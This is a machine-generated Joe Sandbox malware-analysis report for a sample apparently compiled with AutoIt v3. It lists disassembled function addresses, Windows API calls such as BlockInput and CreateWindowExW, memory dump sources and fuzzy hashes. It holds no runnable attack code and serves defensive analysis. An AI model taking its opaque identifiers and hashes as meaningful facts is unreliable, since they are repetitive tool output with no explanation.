                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 85279312e81c48399f84a229b35ed85cad447e4bd14eb2dfca38af1283d1626e
                                                                                • Instruction ID: 7a5262b508783b022761ab5ef6bd7159f3cb7c6d29f575e92bab4032a7315dde
                                                                                • Opcode Fuzzy Hash: 85279312e81c48399f84a229b35ed85cad447e4bd14eb2dfca38af1283d1626e
                                                                                • Instruction Fuzzy Hash: 11B129316506099FD719CF28C486BA67BE1FF45364F258658F89ACF2E2C335D9A2CB40
                                                                                Function 005EB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 67749d56aecad032e4f476fc0d7d0d1149f9698a8c01490ad2a8489bf4d8d4b5
                                                                                • Instruction ID: a85382a1917704715c1082ec2614b31fe95973b89fd2606cf8a5472f4a76a7af
                                                                                • Opcode Fuzzy Hash: 67749d56aecad032e4f476fc0d7d0d1149f9698a8c01490ad2a8489bf4d8d4b5
                                                                                • Instruction Fuzzy Hash: 4F125E719006299FDB24CF59D8816EEBBF6FF48710F14819AE849EB255DB309A81CF90
                                                                                Function 0064EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 0064EABD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: fbcc636023143a873db82b1ab47e5c08efc9342caa59f2ab84ad9c20eb1aaf65
                                                                                • Instruction ID: acccbee8eca8d3535111428c6fa9d1781d46c10b9646adabb973bb468408a778
                                                                                • Opcode Fuzzy Hash: fbcc636023143a873db82b1ab47e5c08efc9342caa59f2ab84ad9c20eb1aaf65
                                                                                • Instruction Fuzzy Hash: D9E01A312002069FD710EF59D808E9ABBEABF98760F008417FD49C7361DAB1A8818B90
                                                                                Function 005F09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005F03EE), ref: 005F09DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: d6955ec0680f0fd3677ce5c07954ea7b5d67f7f9adb862c973ec09b65056ab42
                                                                                • Instruction ID: 1fab38850890e1b825f29d37527bda69b4ebf1d16e3d390e49ee3c15f5c493e9
                                                                                • Opcode Fuzzy Hash: d6955ec0680f0fd3677ce5c07954ea7b5d67f7f9adb862c973ec09b65056ab42
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 005F781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                • Instruction ID: 54f7bf1038b08fdd843f2552fbf850acbbce60e2de636bffcc7580b29332c827
                                                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                • Instruction Fuzzy Hash: 9351697160C60E5BDB3849688A5D7BE2FD5BB5E380F180D09DB82D7282C65DDE02D356
                                                                                Function 00642046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0&j
                                                                                • API String ID: 0-3046324192
                                                                                • Opcode ID: 51d58fb6f4e0881ade1294c11760271812e772bfbf3461a3264e8f16e73e23f0
                                                                                • Instruction ID: b6105c1a70f90f2cffb5c1e1111e5df04daa01b0726f8209555f404634cd9852
                                                                                • Opcode Fuzzy Hash: 51d58fb6f4e0881ade1294c11760271812e772bfbf3461a3264e8f16e73e23f0
                                                                                • Instruction Fuzzy Hash: 8E21EB322615128BD728CF79C82367E73E6B755310F24862EE4A7C37D0DE35A904CB40
                                                                                Function 00606DD9 Relevance: .6, Instructions: 637COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d8610d82c99d2137bfbb0356a1a031c5647af10c8006e8e9e4938d6939a1e00
                                                                                • Instruction ID: 8cc027099975a87351a6d1be30d45ca88d76d9f005288b39042983cdb9aacea9
                                                                                • Opcode Fuzzy Hash: 6d8610d82c99d2137bfbb0356a1a031c5647af10c8006e8e9e4938d6939a1e00
                                                                                • Instruction Fuzzy Hash: EB321421D69F014DD72B9634DC32336A28AAFB73C5F15D737E81AB5AA5EB29D4C34100
                                                                                Function 005ECC39 Relevance: .6, Instructions: 635COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 72a2e80cfbce78458ca15bfd8e9ea36858db00cfbb02041947117ec32c154eec
                                                                                • Instruction ID: e0aa97e4acc5c7f6c9a99b586ea47b7e22e3c49dd4dcc9de57509e4a432cd610
                                                                                • Opcode Fuzzy Hash: 72a2e80cfbce78458ca15bfd8e9ea36858db00cfbb02041947117ec32c154eec
                                                                                • Instruction Fuzzy Hash: E832E531A009A58ACF28CB29E494ABD7FA3FF45320F288566E49D97791D234DD82DF41
                                                                                Function 005D7920 Relevance: .6, Instructions: 563COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d6a7293b1342acc78c57c6d30411e21f01ffb91486c8bfb9ab402cd76723f06
                                                                                • Instruction ID: 710a80eafa37ee04f2547c7ccffefc40310b0c3a8b874507ab416b1737713ab9
                                                                                • Opcode Fuzzy Hash: 8d6a7293b1342acc78c57c6d30411e21f01ffb91486c8bfb9ab402cd76723f06
                                                                                • Instruction Fuzzy Hash: 3C228070A0060ADFDF14CF68D845AEEFBB6FF88300F14452AE816A7391EB35A951CB50
                                                                                Function 005D91C0 Relevance: .5, Instructions: 475COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 623dae9028782276b364c30e39b92b5020ebc3387e4249d4e6c05e3ec0844786
                                                                                • Instruction ID: 9747e1c9d7bda27390bb6300f40dbb9ca481fd92583b308e034a2245c87a1469
                                                                                • Opcode Fuzzy Hash: 623dae9028782276b364c30e39b92b5020ebc3387e4249d4e6c05e3ec0844786
                                                                                • Instruction Fuzzy Hash: 2702D8B0E00206EBDB14DF54D945AEDBBB6FF44300F148566E8169B391EB31EE51CB91
                                                                                Function 005F1C77 Relevance: .3, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction ID: 21cf7690d62cad0de4207c3919d9bab61739a63f4dc0e641bc9c9b3172308d8d
                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction Fuzzy Hash: 179188721084A78ADB29463E857403EFFF17A923A131A079DD5F2CB1C5FE18C958D724
                                                                                Function 005F19B0 Relevance: .2, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction ID: dca3b08cabe3b01ab3f0cfa2c437268f3f928d391c4447abea178361777c3da2
                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction Fuzzy Hash: 1A9175722098E7CADB2D427A857403EFFE16A923A231A079ED5F2CB1C1FD18C554D764
                                                                                Function 005F7A4A Relevance: .2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 369e6e5906e5ce1d2e51b97e7247195e2406800f48341ec2fa4970a52317a1a2
                                                                                • Instruction ID: 2450e25cd9aa24393c400a21348b6295668fd7f63677cb281ddac81174053747
                                                                                • Opcode Fuzzy Hash: 369e6e5906e5ce1d2e51b97e7247195e2406800f48341ec2fa4970a52317a1a2
                                                                                • Instruction Fuzzy Hash: C3616B31208B0E96EE34592C8D99BBE2F95FF8E700F140D1AEB82DB281E55D9E42C315
                                                                                Function 005F1706 Relevance: .2, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction ID: d9b8ea5837d42aba4a7aa51f8825aa9371c9e360fff8024c84be7b4f98b3baba
                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction Fuzzy Hash: 458197326094E789DB2D423A863403EFFE17A923A131A079DD5F6CB1C1EE28D554E764
                                                                                Function 00652ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00652B30
                                                                                • DeleteObject.GDI32(00000000), ref: 00652B43
                                                                                • DestroyWindow.USER32 ref: 00652B52
                                                                                • GetDesktopWindow.USER32 ref: 00652B6D
                                                                                • GetWindowRect.USER32(00000000), ref: 00652B74
                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00652CA3
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00652CB1
                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652CF8
                                                                                • GetClientRect.USER32(00000000,?), ref: 00652D04
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00652D40
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D62
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D75
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D80
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00652D89
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D98
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00652DA1
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652DA8
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00652DB3
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652DC5
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0066FC38,00000000), ref: 00652DDB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00652DEB
                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00652E11
                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00652E30
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652E52
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065303F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: ed0333a1fcfbf10a53bc5d550a2a22369bb2ef59f6ceca794d4489b56e2b3574
                                                                                • Instruction ID: 19246a39b63f456e29b1fe2bd67873f75fa6f8b646b74b189374d2f95170b24f
                                                                                • Opcode Fuzzy Hash: ed0333a1fcfbf10a53bc5d550a2a22369bb2ef59f6ceca794d4489b56e2b3574
                                                                                • Instruction Fuzzy Hash: 42029D71500206EFDB14DF64DC99EAE7BBAFB4A321F008159F915AB2A1D770AD01CF60
                                                                                Function 006670D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0066712F
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00667160
                                                                                • GetSysColor.USER32(0000000F), ref: 0066716C
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00667186
                                                                                • SelectObject.GDI32(?,?), ref: 00667195
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 006671C0
                                                                                • GetSysColor.USER32(00000010), ref: 006671C8
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 006671CF
                                                                                • FrameRect.USER32(?,?,00000000), ref: 006671DE
                                                                                • DeleteObject.GDI32(00000000), ref: 006671E5
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00667230
                                                                                • FillRect.USER32(?,?,?), ref: 00667262
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00667284
                                                                                  • Part of subcall function 006673E8: GetSysColor.USER32(00000012), ref: 00667421
                                                                                  • Part of subcall function 006673E8: SetTextColor.GDI32(?,?), ref: 00667425
                                                                                  • Part of subcall function 006673E8: GetSysColorBrush.USER32(0000000F), ref: 0066743B
                                                                                  • Part of subcall function 006673E8: GetSysColor.USER32(0000000F), ref: 00667446
                                                                                  • Part of subcall function 006673E8: GetSysColor.USER32(00000011), ref: 00667463
                                                                                  • Part of subcall function 006673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00667471
                                                                                  • Part of subcall function 006673E8: SelectObject.GDI32(?,00000000), ref: 00667482
                                                                                  • Part of subcall function 006673E8: SetBkColor.GDI32(?,00000000), ref: 0066748B
                                                                                  • Part of subcall function 006673E8: SelectObject.GDI32(?,?), ref: 00667498
                                                                                  • Part of subcall function 006673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006674B7
                                                                                  • Part of subcall function 006673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006674CE
                                                                                  • Part of subcall function 006673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006674DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                • String ID:
                                                                                • API String ID: 4124339563-0
                                                                                • Opcode ID: 3962a3772334f133c742427d82fc7a02ed56c4040348588d5ac3ab7b37b47638
                                                                                • Instruction ID: 3b2ac42d4971d48e2db5825102fb9c4a453a7ec0da7b5afd21e708cb483d2c6c
                                                                                • Opcode Fuzzy Hash: 3962a3772334f133c742427d82fc7a02ed56c4040348588d5ac3ab7b37b47638
                                                                                • Instruction Fuzzy Hash: 75A1C272008701BFDB009F64DC58E6BBBAAFF89334F101A19F9A2961E1D7B5E944CB51
                                                                                Function 005E8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 005E8E14
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00626AC5
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00626AFE
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00626F43
                                                                                  • Part of subcall function 005E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E8BE8,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 005E8FC5
                                                                                • SendMessageW.USER32(?,00001053), ref: 00626F7F
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00626F96
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00626FAC
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00626FB7
